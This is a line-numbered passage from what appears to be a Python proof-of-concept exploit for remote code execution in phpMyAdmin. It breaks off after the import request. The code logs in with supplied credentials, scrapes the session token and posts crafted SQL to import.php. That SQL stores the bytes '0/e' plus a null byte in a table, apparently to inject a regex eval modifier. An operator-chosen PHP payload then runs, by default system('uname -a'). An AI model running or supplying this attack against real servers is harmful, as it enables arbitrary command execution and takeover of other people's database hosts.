| 28 | |
| 29 | |
| 30 | def poc(url): |
| 31 | url_to_pma = url |
| 32 | uname = USER |
| 33 | upass = PASS |
| 34 | |
| 35 | if DATABASE: |
| 36 | db = DATABASE |
| 37 | else: |
| 38 | db = "test" |
| 39 | |
| 40 | custom_table = False |
| 41 | if TABLE: |
| 42 | custom_table = True |
| 43 | table = TABLE |
| 44 | else: |
| 45 | table = "prgpwn" |
| 46 | |
| 47 | if COMMAND: |
| 48 | payload = COMMAND |
| 49 | else: |
| 50 | payload = "system('uname -a');" |
| 51 | |
| 52 | s = requests.Session() |
| 53 | s.verify = False |
| 54 | sql = '''CREATE TABLE `{0}` ( |
| 55 | `first` varchar(10) CHARACTER SET utf8 NOT NULL |
| 56 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; |
| 57 | INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500')); |
| 58 | '''.format(table) |
| 59 | |
| 60 | # get_token |
| 61 | resp = s.post(url_to_pma + "/?lang=en", dict( |
| 62 | pma_username=uname, |
| 63 | pma_password=upass |
| 64 | )) |
| 65 | if resp.status_code is 200: |
| 66 | token_place = resp.text.find("token=") + 6 |
| 67 | token = resp.text[token_place:token_place + 32] |
| 68 | else: |
| 69 | # print("Cannot get valid authorization token.") |
| 70 | return False |
| 71 | |
| 72 | if custom_table is False: |
| 73 | data = { |
| 74 | "is_js_confirmed": "0", |
| 75 | "db": db, |
| 76 | "token": token, |
| 77 | "pos": "0", |
| 78 | "sql_query": sql, |
| 79 | "sql_delimiter": ";", |
| 80 | "show_query": "0", |
| 81 | "fk_checks": "0", |
| 82 | "SQL": "Go", |
| 83 | "ajax_request": "true", |
| 84 | "ajax_page_request": "true", |
| 85 | } |
| 86 | resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies)) |
| 87 | if resp.status_code == 200: |